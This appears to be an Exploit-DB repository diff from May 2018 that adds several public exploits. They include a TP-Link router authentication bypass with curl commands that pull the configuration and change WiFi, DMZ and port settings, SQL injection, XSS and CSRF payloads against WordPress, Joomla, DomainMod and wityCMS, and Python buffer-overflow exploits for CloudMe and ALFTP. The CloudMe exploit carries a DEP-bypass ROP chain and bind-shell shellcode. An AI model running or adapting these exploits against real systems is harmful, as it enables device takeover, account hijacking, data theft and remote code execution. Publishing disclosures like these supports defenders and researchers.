DB: 2018-05-29

11 changes to exploits/shellcodes

ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)

CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)

Wordpress Plugin Events Calendar - SQL Injection / Cross-Site Scripting
Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting
TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass
DomainMod 4.09.03 - 'oid' Cross-Site Scripting
DomainMod 4.09.03 - 'sslpaid' Cross-Site Scripting
Wordpress Plugin Events Calendar - SQL Injection
Joomla! Component Full Social 1.1.0 - 'search_query' SQL Injection
Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery
Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery
wityCMS 0.6.1 - Cross-Site Scripting

Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes)

exploits/hardware/webapps/44781.txt

@@ -0,0 +1,207 @@
+Title: TP-Link Multiple Router(TL-WR840N and TL-WR841N) Unauthenticated
+Router Access Vulnerability
+Author: BlackFog Team
+Date: 27 May 2018
+Website: SecureLayer7.net
+Contact: info@securelayer7.net
+
+Version: 0.9.1 4.16 v0001.0 Build 170622 Rel.64334n
+Hardware: TL-WR841N v13 00000013
+
+Version : Firmware Version: 0.9.1 3.16 v0001.0 Build 170608 Rel.58696n
+Hardware Version: TL-WR840N v5 00000005
+
+Vendor Description: TP-Link is the world's #1 provider of consumer WiFi
+networking devices, shipping products to over 120 countries and hundreds of
+millions of customers. (source https://www.tp-link.com/)
+
+
+Attack Description :
+This issue is caused by improper session handling on /cgi/ Folder or /cgi
+file found by Touhid Shaikh(BlackFog Team Member).
+
+if any attacker sends Referer Header with its request and sets Referer:
+http://192.168.0.1/mainFrame.htm dan its no authentication required and an
+attacker can do router's action without authentication.
+below are some of few examples you can see. But the attacker can do mostly
+all of the action on a router without Authentication.
+
+NOTE:  Except admin's password change bcz its required current password for
+changing
+
+##### POC ######
+----------------------- Fail attempt -------------------------
+root@linux:/workspace# curl -i -s -k -X GET http://192.168.0.1/cgi/conf.bin
+HTTP/1.1 403 Forbidden
+Content-Type: text/html; charset=utf-8
+Content-Length: 106
+Connection: close
+
+<html><head><title>403 Forbidden</title></head><body><center><h1>403
+Forbidden</h1></center></body></html>
+
+-----------------------------------------------------
+
+--------------- Seccessfull attempt --------------------------------
+root@linux:/workspace# curl -i -s -k -X GET -H "Referer:
+http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin
+HTTP/1.1 200 OK
+Content-Type: application/octet-stream; charset=utf-8
+Content-Length: 5984
+Connection: keep-alive
+
+root@linux:/workspace# curl -s -k -X GET -H "Referer:
+http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin >
+backup.bin
+root@linux:/workspace# file backup.bin
+backup.bin: data
+root@linux:/workspace# ls -la backup.bin
+-rw-r--r-- 1 root root 5720 Mar 30 17:17 backup.bin
+
+----------------------------------------------------
+##### POC END ######
+
+
+Evil Actions Without Authentication example.
+============== Burp Request and curl command for conf.bin or backup file
+=================
+
+
+####### Burp ########
+GET /cgi/conf.bin HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Agent22
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.1/mainFrame.htm
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+-------Response--------
+HTTP/1.1 200 OK
+Content-Type: application/octet-stream; charset=utf-8
+Content-Length: 5720
+Connection: close
+
+w@\ÝÓb êLýªïÀ‡ÉE‹ûaɬ,*-àh[Ú‹³lÙ€ÍÁ.©-
+.....SKIP.......
+8/<2F><><EFBFBD><EFBFBD>W
+
+
+######## Curl ##########
+curl -i -s -k  -X $'GET'     -H $'Host: 192.168.0.1' -H $'User-Agent:
+Agent22' -H $'Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H
+$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H
+$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Connection: close'      $'
+http://192.168.0.1/cgi/conf.bin' > backup.bin
+
+------ take a look in backup.bin file --------
+
+===========================================
+
+
+
+=========== Add Port Forwarding ============
+curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
+Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
+http://192.168.0.1/mainFrame.htm" --data-binary
+$'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP
+or UDP\x0d\x0aopenProtocol=TCP or
+UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3
+
+HTTP/1.1 200 OK
+Content-Type: text/plain; charset=utf-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+
+[1,1,2,7,0,0]0
+triggerPort=23
+triggerProtocol=TCP or UDP
+openProtocol=TCP or UDP
+enable=1
+openPort=23
+[error]0
+
+----- Decription -----
+enable=0 is for disable
+enable=1 is for enable
+u can change port also.
+====================================
+
+
+
+=========== Reboot Router =========================
+curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
+Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
+http://192.168.0.1/mainFrame.htm" --data-binary
+$'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7
+
+HTTP/1.1 200 OK
+Content-Type: text/plain; charset=utf-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+
+[error]0
+
+----Description -----
+error = 0 means reboot seccessully
+======================================
+
+
+
+============= Enable Guest Network ==========================
+curl -i -s -k  -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Aent22'
+-H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H
+$'Accept-Encoding: gzip, deflate' -H $'Content-Type: text/plain' -H
+$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 844' -H
+$'Connection: close' --data-binary
+$'[LAN_WLAN_MULTISSID#1,1,0,0,0,0#0,0,0,0,0,0]0,1\x0d\x0amultiSSIDEnable=1\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,1,1,0,0,0#0,0,0,0,0,0]1,11\x0d\x0aIsolateClients=0\x0d\x0aEnable=1\x0d\x0aSSID=Agent22\x0d\x0aBeaconType=WPAand11i\x0d\x0aWPAAuthenticationMode=PSKAuthentication\x0d\x0aWPAEncryptionModes=TKIPandAESEncryption\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=TKIPandAESEncryption\x0d\x0aPreSharedKey=9876543210\x0d\x0aGroupKeyUpdateInterval=0\x0d\x0aMaxStaNum=32\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,2,1,0,0,0#0,0,0,0,0,0]2,1\x0d\x0aIsolateClients=0\x0d\x0a[LAN_WLAN_GUESTNET#1,1,0,0,0,0#0,0,0,0,0,0]3,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=1\x0d\x0a[LAN_WLAN_GUESTNET#1,2,0,0,0,0#0,0,0,0,0,0]4,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=0\x0d\x0a'
+$'http://192.168.0.1/cgi?2&2&2&2&2'
+
+------- Description ----------
+SSID=Agent22
+PreSharedKey=9876543210
+=============================================
+
+
+
+======= DMZ enable and Disable on 192.168.0.112 ===========
+curl -i -s -k  -X $'POST'     -H $'Host: 192.168.0.1' -H $'User-Agent:
+Agent22' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H
+$'Content-Length: 78' -H $'Connection: close'     --data-binary
+$'[DMZ_HOST_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,2\x0d\x0aenable=1\x0d\x0aIPAddress=192.168.0.112\x0d\x0a'
+   $'http://192.168.0.1/cgi?2'
+
+HTTP/1.1 200 OK
+Content-Type: text/plain; charset=utf-8
+Transfer-Encoding: chunked
+Connection: close
+
+[error]0
+
+-------Description -----------
+IPAddress=192.168.0.112
+enable=1 or 0 (enable or disable)
+=================================================
+
+=============== WiFi Password Change =============
+curl -i -s -k  -X $'POST'     -H $'Host: 192.168.0.1' -H $'User-Agent:
+Agent22' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type:
+text/plain' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H
+$'Content-Length: 199' -H $'Connection: close'     --data-binary
+$'[LAN_WLAN#1,1,0,0,0,0#0,0,0,0,0,0]0,5\x0d\x0aBeaconType=11i\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=AESEncryption\x0d\x0aX_TP_PreSharedKey=9876543210\x0d\x0aX_TP_GroupKeyUpdateInterval=0\x0d\x0a'
+   $'http://192.168.0.1/cgi?2'
+
+-------Description -----------
+IEEE11iAuthenticationMode=PSKAuthentication
+IEEE11iEncryptionModes=AESEncryption
+X_TP_PreSharedKey=9876543210
+===============================
+
+
+
+======= Report Timeline =============
+30 Mar, 2018 ----- Initial Report (support.in@tp-link.com) (No Response)
+27 May, 2018 ----- Full Disclosure

exploits/php/webapps/44782.txt

@@ -0,0 +1,11 @@
+# Exploit Title: DomainMod v4.09.03 has XSS via the assets/edit/account-owner.php oid parameter
+# Date: 2018-05-28
+# Exploit Author: longer（76439392@qq.com）
+# Vendor Homepage: domainmod (https://github.com/domainmod/domainmod)
+# Software Link: domainmod (https://github.com/domainmod/domainmod)
+# Version: v4.09.03
+# CVE : CVE-2018-11403
+ 
+An issue was discovered in DomainMod v4.09.03.（https://github.com/domainmod/domainmod/issues/63）
+After the user logged in, open the url :
+http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E

exploits/php/webapps/44783.txt

@@ -0,0 +1,11 @@
+# Exploit Title: DomainMod v4.09.03 has XSS via the assets/edit/ssl-provider-account.php sslpaid parameter
+# Date: 2018-05-28
+# Exploit Author: longer（76439392@qq.com）
+# Vendor Homepage: domainmod (https://github.com/domainmod/domainmod)
+# Software Link: domainmod (https://github.com/domainmod/domainmod)
+# Version: v4.09.03
+# CVE : CVE-2018-11404
+ 
+An issue was discovered in DomainMod v4.09.03.（https://github.com/domainmod/domainmod/issues/63）
+After the user logged in, open the url:
+http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E

exploits/php/webapps/44785.txt

@@ -0,0 +1,55 @@
+# Exploit Title: Wordpress Plugin Events Calendar - SQL Injection
+# Dork: N/A
+# Date: 2018-05-27
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor: Wachipi
+# Vendor Homepage: https://codecanyon.net/item/wp-events-calendar-plugin/5025660
+# Version: 1.0
+# Category: Webapps
+# Tested on: Kali linux
+# Description : An attacker can perform attacks via calendar ajax queries.
+# However, this plugin is fully PHP-enabled. You can run SQL query with
+# "month" and "year" parameters.
+# These parameters are also suitable for XSS attacks.
+# All PHP queries for which these parameters work have the same vulnerable.
+
+# "getBookingForm.php, getMonthCalendar.php, getEventsList.php"
+# Demo : http://www.checkingarea.com/EVENTS_WP/
+# PoC : SQLi :
+# GET
+/EVENTS_WP/wp-content/plugins/wp-events-calendar/public/ajax/getEventsList.php?year=2018&month=5&day=1&calendar_id=1&pag=1
+
+
+
+# Parameter: month (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: 
+year=2018&month=5' AND 7958=7958 AND 'FXnO'='FXnO&day=1&calendar_id=1&pag=1
+
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: 
+year=2018&month=5' AND SLEEP(5) AND 'MmZz'='MmZz&day=1&calendar_id=1&pag=1
+
+# Type: UNION query
+# Title: MySQL UNION query (NULL) - 29 columns
+# Payload: 
+year=2018&month=5' UNION ALL SELECT NULL,NULL,CONCAT&day=1&calendar_id=1&pag=1(0x71786a7171,0x424e507748695862436e774c4a4d664a7751424c537678554656465a464b7074685051527676756e,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&calendar_id=1
+
+# Parameter: year (GET)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+# Payload: 
+year=-8454' OR 7997=7997#&month=5&day=1&calendar_id=1&pag=1
+
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: 
+year=2018' AND SLEEP(5)--
+uTJs&month=5&day=1&calendar_id=1&pag=1
+
+# Type: UNION query
+# Title: MySQL UNION query (NULL) - 29 columns
+# Payload: 
+year=2018' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a7171,0x7766694a50504a425a6e635a564b5172674c745770414e4f46494977475a44626b416a6c797a674b,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&month=5&day=1&calendar_id=1&pag=1

exploits/php/webapps/44786.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Joomla! extension Full Social 1.1.0 - 'search_query' SQL
+Injection
+# Date: 2018-05-28
+# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
+# Software Link: https://extensions.joomla.org/extension/full-social/
+# Vendor Homepage: https://www.joomlaextensions.co.in/
+# Version: 1.1.0
+# Tested on: Win 10
+===================================================
+# POC : SQLi
+
+# Parameter : search_query
+# Type : Time-based blind
+# Payload : 1%' AND SLEEP(10)%23
+
+# Request
+============
+GET
+/en/search?controller=search&orderby=position&orderway=desc&search_query=1%25%27+AND+SLEEP%2810%29%23&submit_search=
+HTTP/1.1
+Host: www.site.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
+Gecko/20100101 Firefox/61.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://www.site.com/en/
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+
+===================================================

exploits/php/webapps/44788.html

@@ -0,0 +1,61 @@
+# Exploit Title: Joomla! extension jCart for OpenCart 2.3.0.2 - Cross site request forgery
+# Date: 2018-05-28
+# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
+# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/jcart-for-opencart/
+# Vendor Homepage: https://www.joomlaextensions.co.in/
+# Version: 2.3.0.2
+# Tested on: Kali linux
+===================================================
+
+# POC :
+
+# Change user information exploit :
+
+<html>
+  <body>
+    <form action="http://site.com/jcart/account/edit.html" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="firstname" value="D3C0DE" />
+      <input type="hidden" name="lastname" value="revenge" />
+      <input type="hidden" name="email" value="decod3&#46;n&#64;gmail&#46;com" />
+      <input type="hidden" name="telephone" value="100000" />
+    </form>
+    <script>
+        document.forms[0].submit();
+    </script>
+  </body>
+</html>
+
+
+# Change password exploit :
+
+<form action="http://site.com/jcart/account/password.html" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="password" value="2468" />
+      <input type="hidden" name="confirm" value="2468" />
+</form>
+<script>
+   document.forms[0].submit();
+</script>
+
+
+# Change affiliate account information exploit :
+
+ <form action="http://site.com/jcart/account/affiliate/edit.html" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="company" value="decode" />
+      <input type="hidden" name="website" value="test&#46;com" />
+      <input type="hidden" name="tax" value="100000000" />
+      <input type="hidden" name="payment" value="paypal" />
+      <input type="hidden" name="cheque" value="&#13;" />
+      <input type="hidden" name="paypal" value="test&#64;test&#46;com" />
+      <input type="hidden" name="bank&#95;name" value="&#13;" />
+      <input type="hidden" name="bank&#95;branch&#95;number" value="&#13;"
+/>
+      <input type="hidden" name="bank&#95;swift&#95;code" value="&#13;" />
+      <input type="hidden" name="bank&#95;account&#95;name" value="&#13;" />
+      <input type="hidden" name="bank&#95;account&#95;number" value="&#13;"
+/>
+    </form>
+    <script>
+        document.forms[0].submit();
+    </script>
+
+====================================================

exploits/php/webapps/44789.html

@@ -0,0 +1,40 @@
+# Exploit Title: Joomla! extension JoomOCShop 1.0 - Cross site request forgery
+# Date: 2018-05-28
+# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
+# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/joomocshop/
+# Vendor Homepage: https://www.joomlaextensions.co.in/
+# Version: 1.0
+# Tested on: Kali linux
+===================================================
+
+# POC :
+
+# Change user information exploit :
+
+<html>
+  <body>
+    <form action="http://site.com/joomoc2/?route=account/edit" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="firstname" value="decode" />
+      <input type="hidden" name="lastname" value="revenge" />
+      <input type="hidden" name="email" value="decod3&#46;n&#64;gmail&#46;com" />
+      <input type="hidden" name="telephone" value="100000" />
+      <input type="hidden" name="fax" value="&#13;" />
+    </form>
+    <script>
+        document.forms[0].submit();
+    </script>
+  </body>
+</html>
+
+
+# Change password exploit :
+
+<form action="http://site.com/jcart/account/password.html" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="password" value="test" />
+      <input type="hidden" name="confirm" value="test" />
+</form>
+<script>
+   document.forms[0].submit();
+</script>
+
+====================================================

exploits/php/webapps/44790.txt

@@ -0,0 +1,34 @@
+# Exploit Title: wityCMS 0.6.1 Persistent XSS on "Website's name" field
+# Date: 05/28/2018
+# Exploit Author: Nathu Nandwani
+# Website: http://nandtech.co/
+# Vendor Homepage: https://creatiwity.net/witycms
+# Software Link: https://github.com/Creatiwity/wityCMS/releases/tag/0.6.1
+# Version: 0.6.1
+# Tested on: Windows 10 x64 (XAMPP, Chrome)
+# CVE: CVE-2018-11512
+
+*Description
+ 
+A persistent/stored cross-site scripting (XSS) vulnerability in the "Website's name" field found in the "Settings" page under the "General" menu in Creatiwity wityCMS 0.6.1 allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to admin/settings/general.
+ 
+*Proof of Concept
+ 
+1. Attacker logs in as an administrator of the site.
+2. Attacker visits the Administrator page and clicks on the general options then settings menu. 
+3. Attacker enters the script below in the "Website's name" field:
+<scri<script>pt>alert(1)</scri</script>pt>
+Note: The "script" tag is being filtered but not recursively so having the first tag stripped off will still execute the one being combined. 
+3. Once the "Save" button is clicked, the payload will execute.
+4. When an unauthenticated user visits the home page, the payload will also execute.
+  
+*Mitigation
+ 
+See https://github.com/Creatiwity/wityCMS/commit/7967e5bf15b4d2ee6b85b56e82d7e1229147de44
+ 
+Timeline
+ 
+2018-05-27-Vulnerability reported to wityCMS development team
+2018-05-27-CVE requested from mitre.org
+2018-05-28-wityCMS development team acknowledges and will be pushing the fix for production on 0.6.2
+2015-05-28-CVE published by mitre: https://twitter.com/CVEnew/status/1001093385929805831

exploits/windows_x86-64/remote/44784.py

@@ -0,0 +1,140 @@
+# Exploit: CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)  
+# Date: 2018-05-27   
+# Author: Juan Prescotto   
+# Tested Against: Win7 Pro SP1 64 bit   
+# Software Download: https://www.cloudme.com/downloads/CloudMe_1109.exe   
+# Tested Against Version: 1.10.9    
+# Special Thanks to my wife for allowing me spend countless hours on this passion of mine 
+# Credit: Thanks to John Page (aka hyp3rlinx) (https://www.exploit-db.com/exploits/44027/) 
+# for his work on the original exploit 
+                                           
+# Bad Characers: \x00    
+# SEH Offset: 2236   
+# Non-Participating Modules Used: Qt5Gui.dll, Qt5Core.dll,libstdc++-6.dll, libgcc_s_dw2-1.dll, libwinpthread-1.dll 
+                                           
+# Victim Machine:   
+# C:\>netstat -nao | find "8888"  
+# TCP  0.0.0.0:8888  0.0.0.0:0 LISTENING 2640  
+# C:\>tasklist | find "2640"    
+# CloudMe.exe  2640 Console  1 36,632 K 
+                                           
+# Attacking Machine:   
+# root@kali:~/Desktop# python cloudme.py   
+# CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass  
+# [+] CloudMe Target IP> 192.168.12.4   
+# Sending buffer overflow to CloudMe Service   
+# Target Should be Running a Bind Shell on Port 4444!   
+   
+# root@kali:~/Desktop# nc -nv 192.168.12.4 4444  
+# (UNKNOWN) [192.168.12.4] 4444 (?) open   
+# Microsoft Windows [Version 6.1.7601]   
+# Copyright (c) 2009 Microsoft Corporation. All rights reserved.   
+ 
+# C:\Users\jprescotto\AppData\Local\Programs\CloudMe\CloudMe> 
+# My register setup when VirtualProtect() is called (Defeat DEP) :
+             --
+# EAX = NOP (0x90909090)
+# ECX = lpOldProtect (ptr to W address)
+# EDX = NewProtect (0x40)
+# EBX = dwSize
+# ESP = lPAddress (automatic)
+# EBP = ReturnTo (ptr to jmp esp)
+# ESI = ptr to VirtualProtect()
+# EDI = ROP NOP (RETN)
+
+#!/usr/bin/python
+
+import socket,struct
+ 
+print 'CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass'
+
+def create_rop_chain():
+
+  rop chain generated with mona.py - www.corelan.be
+  rop_gadgets = [
+  0x61d1e7fe,  POP ECX  RETN [Qt5Gui.dll] 
+  0x690398a8,  ptr to &VirtualProtect() [IAT Qt5Core.dll]
+  0x6fe70610,  MOV EAX,DWORD PTR DS:[ECX]  RETN [libstdc++-6.dll] 
+  0x61c40a6f,  XCHG EAX,ESI  RETN [Qt5Gui.dll] 
+  0x68c8ea5a,  POP EBP  RETN [Qt5Core.dll] 
+  0x68d652e1,  & call esp [Qt5Core.dll]
+  0x68fa7ca2,  POP EDX  RETN [Qt5Core.dll] 
+  0xfffffdff,  Value to negate, will become 0x00000201
+  0x6eb47092,  NEG EDX  RETN [libgcc_s_dw2-1.dll] 
+  0x68d52747,  POP EBX  RETN [Qt5Core.dll] 
+  0xffffffff,   
+  0x68f948bc,  INC EBX  RETN [Qt5Core.dll] 
+  0x68f8063c,  ADD EBX,EDX  ADD AL,0A  RETN [Qt5Core.dll] 
+  0x68f9a472,  POP EDX  RETN [Qt5Core.dll] 
+  0xffffffc0,  Value to negate, will become 0x00000040
+  0x6eb47092,  NEG EDX  RETN [libgcc_s_dw2-1.dll] 
+  0x61f057ab,  POP ECX  RETN [Qt5Gui.dll] 
+  0x6eb5efa3,  &Writable location [libgcc_s_dw2-1.dll]
+  0x61dc14d1,  POP EDI  RETN [Qt5Gui.dll] 
+  0x64b4ed0c,  RETN (ROP NOP) [libwinpthread-1.dll]
+  0x61ba6245,  POP EAX  RETN [Qt5Gui.dll] 
+  0x90909090,  nop
+  0x61b45ea3,  PUSHAD  RETN [Qt5Gui.dll] 
+  ]
+  return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+rop_chain = create_rop_chain()
+
+
+                           
+#msf payload(shell_bind_tcp) > show options
+#Module options (payload/windows/shell_bind_tcp):
+# Name  Current Setting  Required  Description
+# EXITFUNC  thread  yes Exit technique (Accepted: '', seh, thread, process, none)
+# LPORT 4444  yes The listen port
+# RHOST  no The target address
+#msf payload(shell_bind_tcp) > generate -b '\x00' -t py
+# windows/shell_bind_tcp - 355 bytes
+# http://www.metasploit.com
+# Encoder: x86/shikata_ga_nai
+                           
+shellcode =  ""
+shellcode += "\xda\xcf\xba\x8c\x90\x7b\x70\xd9\x74\x24\xf4\x5e\x33"
+shellcode += "\xc9\xb1\x53\x31\x56\x17\x83\xee\xfc\x03\xda\x83\x99"
+shellcode += "\x85\x1e\x4b\xdf\x66\xde\x8c\x80\xef\x3b\xbd\x80\x94"
+shellcode += "\x48\xee\x30\xde\x1c\x03\xba\xb2\xb4\x90\xce\x1a\xbb"
+shellcode += "\x11\x64\x7d\xf2\xa2\xd5\xbd\x95\x20\x24\x92\x75\x18"
+shellcode += "\xe7\xe7\x74\x5d\x1a\x05\x24\x36\x50\xb8\xd8\x33\x2c"
+shellcode += "\x01\x53\x0f\xa0\x01\x80\xd8\xc3\x20\x17\x52\x9a\xe2"
+shellcode += "\x96\xb7\x96\xaa\x80\xd4\x93\x65\x3b\x2e\x6f\x74\xed"
+shellcode += "\x7e\x90\xdb\xd0\x4e\x63\x25\x15\x68\x9c\x50\x6f\x8a"
+shellcode += "\x21\x63\xb4\xf0\xfd\xe6\x2e\x52\x75\x50\x8a\x62\x5a"
+shellcode += "\x07\x59\x68\x17\x43\x05\x6d\xa6\x80\x3e\x89\x23\x27"
+shellcode += "\x90\x1b\x77\x0c\x34\x47\x23\x2d\x6d\x2d\x82\x52\x6d"
+shellcode += "\x8e\x7b\xf7\xe6\x23\x6f\x8a\xa5\x2b\x5c\xa7\x55\xac"
+shellcode += "\xca\xb0\x26\x9e\x55\x6b\xa0\x92\x1e\xb5\x37\xd4\x34"
+shellcode += "\x01\xa7\x2b\xb7\x72\xee\xef\xe3\x22\x98\xc6\x8b\xa8"
+shellcode += "\x58\xe6\x59\x44\x50\x41\x32\x7b\x9d\x31\xe2\x3b\x0d"
+shellcode += "\xda\xe8\xb3\x72\xfa\x12\x1e\x1b\x93\xee\xa1\x32\x38"
+shellcode += "\x66\x47\x5e\xd0\x2e\xdf\xf6\x12\x15\xe8\x61\x6c\x7f"
+shellcode += "\x40\x05\x25\x69\x57\x2a\xb6\xbf\xff\xbc\x3d\xac\x3b"
+shellcode += "\xdd\x41\xf9\x6b\x8a\xd6\x77\xfa\xf9\x47\x87\xd7\x69"
+shellcode += "\xeb\x1a\xbc\x69\x62\x07\x6b\x3e\x23\xf9\x62\xaa\xd9"
+shellcode += "\xa0\xdc\xc8\x23\x34\x26\x48\xf8\x85\xa9\x51\x8d\xb2"
+shellcode += "\x8d\x41\x4b\x3a\x8a\x35\x03\x6d\x44\xe3\xe5\xc7\x26"
+shellcode += "\x5d\xbc\xb4\xe0\x09\x39\xf7\x32\x4f\x46\xd2\xc4\xaf"
+shellcode += "\xf7\x8b\x90\xd0\x38\x5c\x15\xa9\x24\xfc\xda\x60\xed"
+shellcode += "\x1c\x39\xa0\x18\xb5\xe4\x21\xa1\xd8\x16\x9c\xe6\xe4"
+shellcode += "\x94\x14\x97\x12\x84\x5d\x92\x5f\x02\x8e\xee\xf0\xe7"
+shellcode += "\xb0\x5d\xf0\x2d"
+ 
+ip=raw_input('[+] CloudMe Target IP> ') 
+
+stack_pivot=struct.pack('<L',0x61d95f58) {pivot 3492 / 0xda4} (Lands us into rop nop chain --> rop_chain) :  SUB ESP,8  ADD ESP,0D8C  POP EBX  POP ESI  POP EDI  POP EBP  RETN 0x08  ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ}
+rop_nop1=struct.pack('<L',0x68b1a714) * 300  RETN 0x10  ** [Qt5Core.dll] ** | {PAGE_EXECUTE_READ}
+rop_nop2=struct.pack('<L',0x61c6fc53) * 50  RETN  ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ}
+nop = "\x90" * 20
+
+payload = "A" * 2236 + stack_pivot + rop_nop1 + rop_nop2 + rop_chain + nop + shellcode + "B"*(5600-len(rop_nop1)-len(rop_nop2)-len(rop_chain)-len(nop)-len(shellcode))
+
+
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
+s.connect((ip,8888))
+s.send(payload)
+print 'Sending buffer overflow to CloudMe Service'
+print 'Target Should be Running a Bind Shell on Port 4444!'

exploits/windows_x86/local/44787.py

@@ -0,0 +1,27 @@
+# Exploit Title: ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)        
+# Exploit Author: Gokul Babu                  
+# Vendor Homepage: http://www.altools.com/downloads/alftp.aspx                    
+# Vulnerable Software: http://advert.estsoft.com/?event=201001127730323               
+# Tested on: Windows XP Professional SP3 -Version-2002                    
+# Steps to reproduce-1: (eip overwrite-88-windows-XP)
+# Paste the contents of alftp.txt in 'options->Preference->Security->New password &Confirm password' 
+
+#seh- 0041A6EF "\xEF\xA6\x41"
+#address to jump 0012FA7A
+#nseh- "\xEB\xAC\x90\x90"
+#winexec address 0x7c862aed
+
+#!/usr/bin/python
+
+shellcode=("\x33\xC0"
+"\x50"
+"\x68\x63\x61\x6C\x63"
+"\x8B\xC4"
+"\x50"
+"\xE8\x61\x30\x73\x7C")
+
+buf="\x90"*4 + shellcode + "\x90"*(80-len(shellcode)) + "\xEB\xAC\x90\x90" + "\xEF\xA6\x41"
+
+f=open("alftp.txt","w")
+f.write(buf)
+f.close()

files_exploits.csv

@@ -9745,6 +9745,7 @@ id,file,description,date,author,type,platform,port
 44745,exploits/windows/local/44745.txt,"Flash ActiveX 28.0.0.137 - Code Execution (2)",2016-02-13,smgorelik,local,windows,
 44750,exploits/linux/local/44750.txt,"GNU glibc < 2.27 - Local Buffer Overflow",2018-05-24,JameelNabbo,local,linux,
 44776,exploits/android/local/44776.txt,"Werewolf Online 0.8.8 - Information Disclosure",2018-05-27,ManhNho,local,android,
